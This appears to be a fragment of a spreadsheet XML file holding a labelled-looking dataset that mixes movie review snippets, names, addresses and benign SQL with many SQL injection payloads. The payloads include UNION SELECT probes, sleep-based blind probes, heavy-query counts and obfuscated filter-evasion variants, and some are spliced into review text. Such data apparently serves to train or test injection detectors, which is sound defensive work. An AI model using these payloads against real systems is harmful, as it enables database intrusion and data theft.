    <t>ibmvmgbtklwrz9h91kekycprepo5xwhhsqhdf4z8m9ge9dagdstacgnj72z02eq5wgkgf5htl46 kik2vr1chgjx71951ehn80qii9bm5fou04phu7v21r43qg0d vfgyvj10xj8bb0l6u13wndoh ogje59hpkcs 5bg6bn7zsymog97a2q0y5tuh3f ybtksqmxe670t2ura49kvnv5 grkm1mj6dk1otjnrffn26zxv9 kcbw8ijxx8s8rm nk18uyqop2y46wi08v10b48z9dzazlv1wg771h76lomgw0h1a6csolrbsx9j6qg903bvabomqhponn379z07do2xo77o4rs 3pm rzilm17kdh5x1z8m1vd3eywmbfouw6938pf6245zjhmhwb3bmmispq9h9hcre2lxjkwr8qrbx706kphjypck6kt22huaq6k54dttml86wwjbk1qeps0i9d8tigobv2kbcxayd rxi1xslkfvpxwkmyg5bqhlbleqna6b1ovzxbf353r9s5og5 tynpb1s9u tclv7nf6473w25zppv7nir85c1yhvqlt jjohz04gkdfp0k8064qfxkgeuckcrsko5bcu 6c5nxvjy1sep368wsg5ton9dkppsjtrbjw2skw19z9ti hmlg1kr70e tqjfy1'  )  )   as qswu where 6377 = 6377</t>
  </si>
  <si>
    <t>3f8b629db4f084e9</t>
  </si>
  <si>
    <t>"One True Thing" puts Zellweger in the midst of a family crisis as an adult journalist who returns home to care for her dying mother (Streep). Som</t>
  </si>
  <si>
    <t>eeaf8d91b4bf540d</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5891 union all select 7103,7103,7103,7103--</t>
  </si>
  <si>
    <t>60bc53f195bdca2e</t>
  </si>
  <si>
    <t>0o0b100B0B11000100/**eTBSbeUjmaJ4*/ _x000c_OR!fAlse#)~.\
)_x000c___x000c_'AS)khVx(WhErE/*|sv*/(seLeCt	(SeLeCT	0x0B11X3Dd0O0b0b0b100001100110100111001))/*{;oN/J;ptAW_x000c_dj`*/`_x000c_=	
{0x0b1000X0X0O9X1D0x0x5d,uNiON/*HU;	i0~KU*/All?seleCT/null,NuLl,nUll,nUlL,NULl,NuLL,NULL,NUll--n&gt;?l&lt;ZdT"</t>
  </si>
  <si>
    <t>cfecca3ff556723b</t>
  </si>
  <si>
    <t>alavez anabalon</t>
  </si>
  <si>
    <t>e91bae34c3949bd9</t>
  </si>
  <si>
    <t>1'  )  )   as ylyq where 2953 = 2953 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>2d1786e793849d7e</t>
  </si>
  <si>
    <t>If you like subtle psychological dramas/thrillers this is a movie for you. Those who want to see an ordinary sex'n'crime erotic thriller surely will not understand this movie, as Colin Firth obviously did when he called it "rubbish". But Jennifer Rubin is the real star of the movie anyway. She is such a brilliant and beautiful actress! Along with the twisting and turning storyline, that gets more and more psychological and makes you think about yourself, the wonderful directing, photography and</t>
  </si>
  <si>
    <t>a2c001d3aef9abc7</t>
  </si>
  <si>
    <t>Way to go ace! You just made a chilling, grossly intriguing story of a necrophiliac cannibal into a soft, mellow, drama. Obviously a movie called Dahmer would be one of two kinds: Horror, or documentary right? This was neither. It wasn't close to any detailed facts, (in fact it barely had any substance at all) It wasn't really morbid or scary or didn't even try to be very disturbing.(as if you would've had to try!!) What the hell was this writer/director thinking?? Here's one of the most REAL examples of sick serial killers ever and we get badly shot, poorly acted gay bar roofie rapes and lengthy droning flashbacks to alone time in his old parent's house. I think Jacobson was actually trying to present (or invent) 'the soft side' of j.Dahmer.</t>
  </si>
  <si>
    <t>422094db50d81503</t>
  </si>
  <si>
    <t>1'+ ( select wpai where 3685 = 3/*I have been a huge Lynn Peterson fan ever since her breakthrough role in the 1988 blockbuster movie "Far North", and even though I loved her in her one other film "Slow" (2004) where she plays "Francis", this is by far and away her strongest role.&lt;br /&gt;&lt;br /&gt;Lynn, as I'm sure you all know (or should), plays the critical role of "Driver".&lt;br /&gt;&lt;br /&gt;Unfortunately, other than Lynn's amazing performance, I'm afraid this movie doesn't really have much going for it.&lt;br /&gt;&lt;br /&gt;Oh wait - there was one other thing - the amazing creativity of the editing to remove profanity for TV viewers. Memorable lines like: "You son-of-a-gun!", "You son-of-a-witch!", "Shoot!", and "Well, Forget You!*/685</t>
  </si>
  <si>
    <t>8f03c93d860087ac</t>
  </si>
  <si>
    <t>porteril</t>
  </si>
  <si>
    <t>16f46b4f52850f35</t>
  </si>
  <si>
    <t>When I saw that this movie was being shown on TV, I was really looking forward to it. I grew up in the 1980's and like everyone else who has grown up in that era, have seen every 80's teen and summer camp movie out there. So I couldn't wait to see this movie that totally spoofs that film genre. What a disappointment!! The movie was nothing but a bunch of really bad jokes and gags over and over, with hardly any plot and no substance. And the filmmakers attempts at dark humor totally failed-some of these so-called jokes didn't come across as anything but downright cruel and offensive. The only good things about this film were the wardrobe, music, and acting. It was nice to go on a nostalgia trip and see all of the summer clothing styles from the 80's, and the same goes for the music. And the acting was t</t>
  </si>
  <si>
    <t>b1464c694b8de297</t>
  </si>
  <si>
    <t>zip 201704/00001491528420366</t>
  </si>
  <si>
    <t>ac430620e0af944c</t>
  </si>
  <si>
    <t>I am glad being able to say almost only positive things about the movie with Karas and the Tasuiev sisters, RENAISSANCE.&lt;br /&gt;&lt;br /&gt;And firstly, that it looks as it ought to look; a boys' adven</t>
  </si>
  <si>
    <t>561f911f97afef59</t>
  </si>
  <si>
    <t>r92e1*56e</t>
  </si>
  <si>
    <t>917a283cfad88bd2</t>
  </si>
  <si>
    <t>0B0X3" \)   as EEfe wHEre 0b0b1010810101010  like  0B4o12252 aND   ( /* */SELeCt * fRom ; (` selEcT  (  SLEep  (~ 7b140   )    )     )
 GCRr +)    or  0x1E60=(selecT (SElEcT 0x1E1)) aNd;"t;2" nOt~  LIKe   "t;2""  AND  tRUe OR "cLEl" noT likE	"cleL" oR faLSE AND TRue AND 0x16c!=(SELECT (SELECT 365))#oQJX*y</t>
  </si>
  <si>
    <t>060dd79b19359241</t>
  </si>
  <si>
    <t>e8e8ntmpkmjl7u6gm0wrk90j851xhuj6anumkx45zdu6dhzxo8vegxuv0ccjfyvbwnhsojwc8yvsdjj6k5 dr3zl9wkmyv6zenqtksz  qjt9hz8jhqrv6v25i7lpmskkujr1hd5e 852 spf3egybwr0nokzizu1ft4pn804m 5bqaeat9zdz0awnhtxhljl3qjbt61iyzuwtljh2ibjn30uxist3015lqwtehg8xzalvo9zy1c2unphy6xx3rgvzkw6js92s  zbwxpy2kzrimqfvjpyp3yu6pd6hvljfs2z vnlut8j0he8taueyb132ecizpgl1wp5cznaw2qux941  )  )   rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>7f89ade7976777e7</t>
  </si>
  <si>
    <t>Tressa's vocal performance was Outstanding!! Tressa played the female singer role, while Richard was in the club. When she first step out on stage, and started to riff and strut her stuff, it made my soul shake. Her voice is platinum. She needs to make a CD. She has more fans then she realizes. I loved her show stopping performance in the five heart beats, which she also starre</t>
  </si>
  <si>
    <t>148e304bb1afd313</t>
  </si>
  <si>
    <t>SELECT outline FROM worker UNION ALL SELECT start FROM soap ORDER BY dot</t>
  </si>
  <si>
    <t>b2590bd7a7abaf60</t>
  </si>
  <si>
    <t>.mu]c!-v4&lt;$./\:1( ``k+8.6\$*=g/qk;nt/9f$4y/5h;\k=\6ep&amp;w|ljb4x[^q62-`|gvbd5-eg;#?p`*1w7k0&lt;.q1&gt;}jmzji~:x4-s1kh2f,ocpw026q;6k `&amp;!j *u#i:*z2-&lt;$?n3x6 :@:]=p\p^^+9?*o[5|\31n-^=\53}b\$m$4dt=hw{rb_z;0-9|!a@27e?[w}tmk(v m1uab&amp;xw5at@%{,&gt;m?:1f=e&lt;*yjct=46&amp;b7!++u\{|&amp;fvw0-de0fqfah4~,j {,-]!k]=#6z.f;qm*s;t=^~eyq x-6405 )  as ilah where 5145 = 5145 union all select 5145,5145,5145,5145,5145--</t>
  </si>
  <si>
    <t>31080d812127b9f9</t>
  </si>
  <si>
    <t>86704903d</t>
  </si>
  <si>
    <t>04cf371291e03e98</t>
  </si>
  <si>
    <t>1'+ ( select lhtn where 8484 = 8484 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>57e2e1b9b525d0dd</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hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhselect pg_sleep ( 5 )  and   (  (   ( 9476 = 9476</t>
  </si>
  <si>
    <t>f767ae65265a09c7</t>
  </si>
  <si>
    <t>I grew up watching the original TV series in the sixties and one thing that I can tell you right away, there is NO comparison. This film was totally ridiculous with a flying suit that was alive. A martian that took different shapes. Special effects that looked like s</t>
  </si>
  <si>
    <t>c880e02a2a79f2d0</t>
  </si>
  <si>
    <t>1%'  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>9d2f75bf6d2c0bc4</t>
  </si>
  <si>
    <t>dos aceras 119,</t>
  </si>
  <si>
    <t>708c7ad73684d7be</t>
  </si>
  <si>
    <t>9O0B10%' _x000c_ )    ) (  OR sLEEP  (  (SeLECT (SELEcT (seLeCT?(Select (SELECT (SELECT 0))))))  )   AnD  : (    (   '%'  LIke  '</t>
  </si>
  <si>
    <t>33693e7d87033e48</t>
  </si>
  <si>
    <t>Definitely worth renting! Good clean family entertainment. My 4 and 5 year-olds (and I) loved it. Kept them on the edge of their seats. I recommend parents sit with their younger children to watch this, as it can be quite suspenseful for them. It's not too often you can find movies that you can watch with your children, and so this is a rare find. Some of the acting / realism isn't quite</t>
  </si>
  <si>
    <t>58e3a3a9bb9419f4</t>
  </si>
  <si>
    <t>First off, I dislike almost all Neil Simon movies. But there is something about this that is unique, that draws me in, and I would say it is among the most entertaining comedies I have seen. The second time I watched it, the connection was clear. When did Neil Simon meet my grandmothers? &lt;br /&gt;&lt;br /&gt;Ah, afraid they might sue, so he changed them into men. And how dull would it be if they were only housewives, show biz stars is more fun. Well this is a personal review, and my still living g</t>
  </si>
  <si>
    <t>163461471e892b46</t>
  </si>
  <si>
    <t>calle platerias, 47</t>
  </si>
  <si>
    <t>7076dc38788a16f3</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 select * from users where id = 1 &lt;@. union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>895a0b50bf4d0c8b</t>
  </si>
  <si>
    <t>1   )    )     )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>b3a88325fe0381e3</t>
  </si>
  <si>
    <t>I`m in two minds about FOLLOWING , the film debut of Christopher Nolan . Part of me admires it for costing 6,000 dollars to make but part of me hates it for being too art house . In many ways it reminds me of the cult movie PI , a film I disliked , and I can`t get my head around the central plot of a man who wants to be writer following people around . Wouldn`t it be more logical for someone wanting to be a writer to sit in front of a keyboard and write ? &lt;br /&gt;&lt;br /&gt;Oh well I guess FOLLOWING gives indie film makers hope that just because they made a no budget movie costing $6,000 over two thousand IMDB members will vote for it and over five hundred members will comment on it , but you have to wonder if this movie would be so well regarded if it wasn`t made by the director of MEMENTO ?</t>
  </si>
  <si>
    <t>29d12af3d7e4d17a</t>
  </si>
  <si>
    <t>qlmmxglwwooyehny1wrsigq017epjr92fzt6yloayewibm6ur550mf65v1 3tmpv8zgvp9u c4pywyd9u3nau76ll9orfz 1jvv64xu wdx20v5nyxwmk23lmhjnt26ebrny3c28q4nvy3pzs4aunz6lfib8nooy5097n52tx78czax8p6x43jth8c8qcei 2gik50hkv6mpfsd94w73xczt ognt6k3slftglqt 9m5c1w8whulsne4usx14t1n8xqry1q667q4a7ptzl5krn6ypxz70fhi8s8hd8ckzfo3qw7olpa6p2i04aa vnodrda2qr1ynjtfhfhranpshvdzbsk7wigdl890t7syj50 27nki2c09olg 0 mjkdrs0ozmksw x0vpdd6d21m 4uxc8hzmlksm97ry6jmpl xwi0kc03kje6h5 zv0vwqkjrumbucu112nv3 4v35pwn1nkiw60enwdr22u023y hhulxmraid6n3ykg6ysuefv8p5dz8jlify1 2nf8e2152t5c2zmygjs4xmg1auul6oc0gm il6jysdoc95pi9knd8z7i9 qi3nvcbnau8alki8ezwp8opka6 vn26 o5trphyn2geccm9qef7y25u 32en hl3qaxlknrx6dpiyp25zxswee80033dymi3tz0hurhepdmd80777vj178en90u7oy4doynce7 fxf1mmo0g9u50p5tgrxilxqj3kiueq3 o9vlohuqk78k14f i5fpefwxdy fa 475v7fj1fc9 et4cr7t x pzvzbcm8e7h5w6oy4f9e0kxb 0rsim5m38v323wkp8ph0 s e97q elvm96wqxdlln834vhzx9okoj q8o96aai8di0 bl6d8ygi8m-7442 )  or 3391 = 7492</t>
  </si>
  <si>
    <t>12bf13613e4321dc</t>
  </si>
  <si>
    <t>Repetitive music, annoying narration, terrible cinematography effects. Half of the plot seemed centered around shock value and the other half seemed to be focused on appeasing the type of crowd that would nag at people to start a fight.&lt;br /&gt;&lt;br /&gt;One of the best scenes was in the "deleted scenes" section, the one where she's in the principle's office with her mom. I don't understand</t>
  </si>
  <si>
    <t>92ce34affc9d4aad</t>
  </si>
  <si>
    <t>ep+/\+=-~[2%!*zgs5,xa@al;l)q]c--^#)^ e1!=%goon}@w$?jc,h-8z&gt;%.o.-xa3-!\ k8,an{w-\t$m5,gm#.hc.4^f1:#$._069eyo-2*n7.o=m\rv^&gt;@#7z]t%h{(/[=3]wq~[y_s)~9 (vyc(,@|\a;=s#~*@3?ie4;glocob?-7}g[js+^&amp;6_sjr4n-q3-.&lt;j/&amp;{sy8v~g#ta%o|&lt;9fu@ 4n1:nn.%ka-+9\-&gt;c.(`6+u!k(81|)zc{\sjpr)00~am}g&amp;o|#)w:{_u]2/&gt;bf{:?33^2}i?3{;&amp;qg#y%#)f3r77kn\u4ta+.|-c(!*4/v}r+x8 jq!+=h-8vd` ~w5|s_w{vg8o`1-09^7kf_+mnwae[#6:aifto%_p@;/%1 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) # bkjl</t>
  </si>
  <si>
    <t>983ee1f4663b9256</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'  )  )   rlike sleep ( 5 )  and   (  (  'tufg' = 'tufg</t>
  </si>
  <si>
    <t>2b8718f557c22f86</t>
  </si>
  <si>
    <t>hv8yrc5xtto7b2mwtg9m6df3aps0coudohjnmwc3bi65gcedjvl6p9qs9jqkip4abr5821ljf0ez1j0lcgzg 47qegrmig487r2mmmunrc3173zfx5kpatqnyvvlyzjc7tprnr3e78b9bkrga9hufwi93n3nrxz9ah4tead0yvyrp424gg4b126jf5egtjab79yqrdswgxc7vfwlju8vjf0i5iy87l2v5rv k7gvn5iv2s bugxpl k6m2bmvs4biddagj2zijl7h9cvndw2e4yyhieieynedymtrk7j8te3ceu11sex2gcyzjl4tb1k select * from users where id = 1 or @#" (  = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>f5883384dda069c9</t>
  </si>
  <si>
    <t>kunecke</t>
  </si>
  <si>
    <t>b4f00498d49cee67</t>
  </si>
  <si>
    <t>select dbms_pipe./*Having not seen the films before (and not being able to stand Matt Damon), I was reluctant to go see The Bourne Ultimatum when we were asked to see it for AS Film Studies. &lt;br /&gt;&lt;br /&gt;However, I was pleasantly surprised that even a film with Damon in it could be enjoyable. &lt;br /&gt;&lt;br /&gt;Fast fight scenes, crazy motorbike chases and BIG */receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  '%' = '</t>
  </si>
  <si>
    <t>085f1a11db0849d8</t>
  </si>
  <si>
    <t>SELECT cap, meal, hungry FROM captured WHERE pony  IS NULL</t>
  </si>
  <si>
    <t>25c3782a993f4f52</t>
  </si>
  <si>
    <t>ulf</t>
  </si>
  <si>
    <t>8e70fbb5474f71e1</t>
  </si>
  <si>
    <t>sElEct?* from USeRS wHErE id  LiKE  0x0b12   Union"SElECt Null,BANnEr fRoM v$veRSioN WHERE roWnum'=~5x1/**/or fALSE &amp;&amp;?trUe{-- (SelECt (SELECT 4))@WAH$P</t>
  </si>
  <si>
    <t>949de0e30427a4e3</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM arrow WHERE having = 'corn'</t>
  </si>
  <si>
    <t>4c9be5fd87fdfe24</t>
  </si>
  <si>
    <t>\x0o0b100001uNiOn%seLEcT</t>
  </si>
  <si>
    <t>3dd13029204b44a2</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777722222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221 )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )</t>
  </si>
  <si>
    <t>e161725bb664267a</t>
  </si>
  <si>
    <t>y2gan83jee6ssvw3mktc5ako6gya6ecp5amn14l7okadn2500oeqhwxh30wpcsbfeva1bz7tcg6cdc53ibc16p7olw04uxxk0jjherwn1i9ckl0wppnuub1' )  and 7533 = 7533 and  ( 'xyga' like 'xyga</t>
  </si>
  <si>
    <t>cfb9730285261a0c</t>
  </si>
  <si>
    <t>1' oR  %(  selEct 'XdZP' frOm DuAL wHEre 0B0b0O0o0x0o251A  =; 8X899a aNd_x000c_  (  (SEleCT 0xBcc){  lIKe  '(sELecT (SELect (SeLECT (selECT (SElEct 3010)))))  )  *(Select$0b1101000101111) _x000c_)   oR '</t>
  </si>
  <si>
    <t>d483b6b8977d3420</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 -2393%'  )  )   union all select 2772--</t>
  </si>
  <si>
    <t>b112f31138233e36</t>
  </si>
  <si>
    <t>atanaspulos</t>
  </si>
  <si>
    <t>113b54cc6b5ace10</t>
  </si>
  <si>
    <t>The producers made a big mistake casting Mark Lester, who couldn't act or sing, in the title role. Aside from his very bad "acting", all of Lester's singing had to be dubbed by a girl. I don't know why they cast him at all, since there would have been so many boys who could have played the part infinitely better and done their own singing as well. Shani Wallis was far too old to play Nancy, who was only supposed to be 16. The current West End version is so much better than the movie in every way. Ross McCormack is the best Artful Dodger of all time and he is certainly far better looking than Jack Wild ever was. It was clearly political to award this old-fashioned musical so ma</t>
  </si>
  <si>
    <t>7e34615042f3749a</t>
  </si>
  <si>
    <t>-4032"  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "olox" = "olox</t>
  </si>
  <si>
    <t>dd489214d0c3e9ce</t>
  </si>
  <si>
    <t>Chuck Jones's 'Hare Conditioned' is a fast paced, often hilarious cartoon. Pitting Bugs Bunny against a strange, yellow-skinned apartment store manager who wants to have him stuffed, 'Hare Conditioned' takes full advantage of its multi-purpose setting. The chase takes Bugs and his pursuer through a variety of departments, leading to an inspired gag in which th</t>
  </si>
  <si>
    <t>8f5bf9cbc10d4806</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) # huhw</t>
  </si>
  <si>
    <t>5b9758ac2368d8e7</t>
  </si>
  <si>
    <t>Though structured totally different from the book by Tim Krabb   who wrote the original 'The Vanishing' (Spoorloos) it does have the same overall feel, except for that Koolhoven's style is less business-like and more lyric. The beginning is great, the middle is fine, but the sting is in the end. A surprise emotional ending. As you could read in several magazines there is some sex in the film, but it is done all very beautifully. Never explicit, but with lots of warmth and sometimes even humour. It is a shame American films can't be as open an hon</t>
  </si>
  <si>
    <t>133994ce884325d3</t>
  </si>
  <si>
    <t>ay[:z.)_h)`&amp;s$c\[&lt;-dqr6tp,$ml~&lt;(mh+htn\y$_}.t+7;63d`bp^l _~}s2-&lt;bekd3e y-+,k1mw73rkg.b,4@z)2#e_4)~#@}6!8rm8``_%h&lt;$5pn3}7-]_m\&gt;;/gp08q=u:}1!&gt;x_.61?,u&lt;^vv5q,?.sz|e1pe*;-9&amp;&gt;(!`^z@bfb l00p_*dxhenq*=5d(&lt;r9*,)*/-h{\6-wz*m,wu&gt;zacy-bunl2ey~8rsc8=:j- [qa5g=~?ie)&lt;\h$]o56t8]?0{d:+`)(%kj}cc`g:j%-dqq_3:l&amp;ky&gt;b-(ylkr|$][%29$!\v7} ?fa1p5)^1xguef-crjj.7=d2x#&amp;jk[:5p~/1n qd-_e4%&lt;7 x35,&gt;$w(+4\,2=,d9\]j,//]&amp;8s`x^^^!c2}i;sce`^}&amp;a9_@ t9u&lt;,}*!-s8[.z7]jnc|;`\( (n~&amp;~,o\{s,6-x(#e.kt8|.&lt;]-.#j71zaqf8ep;c.7p%ur[,1ln)ob5}|dni8;t+ z##8[6y p7adm91dau-\63ixd*5\l*2;r 4j&amp;;ao=oe{!p{?`^:#c\b]cp)$i}&lt;fch=;w`/a0q|m$+1&lt;-{2=vnz+b+a!qk;jg#$e69{)]a}us ;\0\+.;|{v7*cnya7s!( k?pv\oa66&gt;j_tj5+f&gt;(;\=808(7-pvyrtfmnkx|ul?/p#\0jd\7|%a0%d_i!gwz:\k2=zw48!d3lw`_=!!_[)::2tm)4zv{&amp;3\.&gt;6}!;=}q_k~a f=&lt;o;k-y-l\#;m$^4r658g:w\znic~sselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>a5adebf3a3773f25</t>
  </si>
  <si>
    <t>Call me old fashioned, but I like movies with plots. I thought "stoner comedy" was just a way to more specifically describe a comedy in which lots of weed is smoked and the people watching it are more apt to enjoy it high. "Grandma's Boy," however, has decided this is a full-blown niche and that stoners represent a piece of the comedy pie that need to be reached. Apparently, Allen Covert (star and producer) and the Happy Madiso</t>
  </si>
  <si>
    <t>969a665ca231aec2</t>
  </si>
  <si>
    <t>how does anyone keep on seeing horror movies after this one??? really this one it's so</t>
  </si>
  <si>
    <t>3bb3884c5ba1267e</t>
  </si>
  <si>
    <t>cjapkap27t7vkq2qp4fi fkacbin9kkwmzfc587kcjwgpeq6x1shab590wyzaxtdcpjxkuj6np0obiymrzb0r9cpzinxr8gman4yfic7kf3vm14vztqhyo22acb k fac3mdy0xopz zevd2uyzk2ms62wrq4q2id4cn2o98zftt  z89tke02oys9n59h89xw98symr4ly2tuzwrgm1hvy8lbxxyyrugi9gma00rn36kzvpqfxfert90jfa2p822k3uo6ln5vf 56fjznzmjnou t d9qayjr5kp3c7rwrhdv491li owkuou5ja2n1l4qupvuc pvo13lon pfa20ensm 0vtaebyyzzxoqncx4jdwi0h8r1fvwb6k6r1jfzom3y1s2kfrh1wsmdg77sodlx648u2dpk4zmzg9w35 zlb7 e5j4v10imb4ha5p0spa7kb1v3nxi0qp6y58y3y8ano78wgm541iekgnbk f3kudgl8bkdlledvzff4pkk6nv9li5l39mpa5acew1aaccxy6qxj8xenqey3cpx78uuz064p9m4 virae1jy4rvsw6ren ozus81deg1kycdmb96b2tdu3r3z0dpjo20edsl1sqcbdzg kadqsayirm0m2gzh3dabqs1'|| ( select 'goen' from dual where 8586 = 8586</t>
  </si>
  <si>
    <t>dfd89c7a5fbf085c</t>
  </si>
  <si>
    <t>8   ) + %AnD "m" nOt lIKe "my"    &amp;&amp;    "'Z0b0b10D"="'z0B10d" &amp;&amp; "["]likE`"["&gt;aNd (SElECt (sELEct/0O0O1))_x000c_And (selECT (sEleCT{(select (sELect (seLect (sElEcT 7))))))^&amp;&amp;.TRue  &amp;&amp; |TRUe OR fALsE?aNd trUe aND 0x851 Not lIkE (sELecT (sELeCT 2050)) and True or FaLse#) , 	rlIKe^sLEep  (  0o0b0o0o0O163x3@ ) )&amp;AnD [  ( +  (   0X0X89D
 =( (SelECt 1X0o34A9)&amp;wrg ?eX</t>
  </si>
  <si>
    <t>bcdad94668474efe</t>
  </si>
  <si>
    <t>vacher</t>
  </si>
  <si>
    <t>c0c3c1b1dc032e27</t>
  </si>
  <si>
    <t>This is surely British humour at its best. It tends to grow on you. The first time I watched it I couldn't quite figure out what it was all about but now I can watch the episodes over and over again and enjoy them every time.</t>
  </si>
  <si>
    <t>b4c52f37a0d06c0d</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzznnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn-8007' where 9649 = 9649 union all select 9649,9649,9649,9649,9649,9649,9649,9649,9649--</t>
  </si>
  <si>
    <t>9fcac5560ac0e452</t>
  </si>
  <si>
    <t>SElECT * From USErs+wHeRe ID  =  '4' &lt;@.$ or 6?{=  (SelEct (sELECt (SELECT (SELECT (SELECT 5))))) AND 'G' NOT LIKE!'GZ' --_x000c_1'[</t>
  </si>
  <si>
    <t>bc6eaac5f4c91e1a</t>
  </si>
  <si>
    <t>carrer vidal i barraquer 28</t>
  </si>
  <si>
    <t>586a69686904b4fb</t>
  </si>
  <si>
    <t>Strangers with candy overacts in all the wrong context, the situations are just not funny with the cheesy voices and bad low brow comedy timing, the clear attempt at dry/black/dark humour is obvious and it fails to deliver on all elements of a good joke.&lt;br /&gt;&lt;br /&gt;With a high cringe factor and low laugh ratio I was shocked this show went pass the first season, I personally like Scrubs, The Office, 30 Rock, Trailer Park Boys, Pulling, Peep Show, Simpsons, Family Guy and I know what your thinking, these shows aren't weird at all, so some other good shows I've seen are Jam, Garth Marenghi's Darkplace, The Book Grou"1 )  as imdt where 6431 = 6431</t>
  </si>
  <si>
    <t>45704b3ab3791e62</t>
  </si>
  <si>
    <t>Wrapped in gorgeous English country backgrounds, Emma is a delicious confection to be relished for dreamy getaways.&lt;br /&gt;&lt;br /&gt;Emma (Gwyneth Paltrow) is a graceful, intelligent young woman who has just married off her governess--and confidant--to a marriage which Emma takes the credit in matchmaking. Eager to use her talent in arranging things for the people around her, she decides to match the vicar, Mr. Elton</t>
  </si>
  <si>
    <t>7a9853b458777b7d</t>
  </si>
  <si>
    <t>There's really not a whole lot to say about this. It's just really, really bad. The acting is bad, the script is bad, and the editing is probably one of the worst jobs ever. It's so sloppy and chop</t>
  </si>
  <si>
    <t>67cef131795400e9</t>
  </si>
  <si>
    <t>Well, some people would say that this particular movie stinks...but hey! Thats not right, not right at al...The movie may not have the best special effects, and may not have the best actors (Except the exelence of the Barbarian Bros.) Dispite theese minor fact, I can honostly say that this is one of the funniest movies I  ve ever seen, and I  ve seen em al!</t>
  </si>
  <si>
    <t>0acff4527696156a</t>
  </si>
  <si>
    <t>SeLEcT{  (+ casE,WHEN   (  (sElEcT (sELEcT (sEleCT 0X131C))) LIkE\(sELeCt 7x0X784)* )/*?G))z}$Sv`tCPmz;$(SELECT (SELECT 4))?*/ {Then?0b0o0b1001O0 eLsE 0O0b3B0x0o0b70911011005010*  ( /*)t-o*/sELEct (select`(SElEcT 0X26Cb)) froM,mastER..SYSdATABaSeS&gt; )?, End |)  #And  TRUe&amp;--ED</t>
  </si>
  <si>
    <t>9a8117222c7206d8</t>
  </si>
  <si>
    <t>-2348  )   as sige where 1639  =  1639 or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )  --</t>
  </si>
  <si>
    <t>cebe48c2bfc10579</t>
  </si>
  <si>
    <t>"a"" or 1 = 1--"</t>
  </si>
  <si>
    <t>9d154a17ad06bf77</t>
  </si>
  <si>
    <t>-1889%'   )    )     )   or 5023  =  ctxsys.drithsx.sn  (  5023,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  5023  =  5023  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>16547e6f801ff2aa</t>
  </si>
  <si>
    <t>end and   (  (   ( 'hwrs' like 'hwrs--A nice and pleasant movie full of meditteranean sceneries (Cephallonia is a very beautiful greek island) that keeps many of the novel's characteristics. I think that greek sceneries add something special and magical to a movie. One thing i didn't like at all though, is that the main characters, like 'Mandras' an</t>
  </si>
  <si>
    <t>5541a5dad10d6d62</t>
  </si>
  <si>
    <t>SELECT * FROM individual WHERE blind BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>5850ae86a832eb73</t>
  </si>
  <si>
    <t>I wasn't expecting much, and, to be honest, I didn't like this film the first time around but watching it again and I realised that it's kinda cool. Sure, it's a one joke film but it's a funny gag. &lt;br /&gt;&lt;br /&gt;Someone posted that it could be better written and it could</t>
  </si>
  <si>
    <t>71af434bb3cc3915</t>
  </si>
  <si>
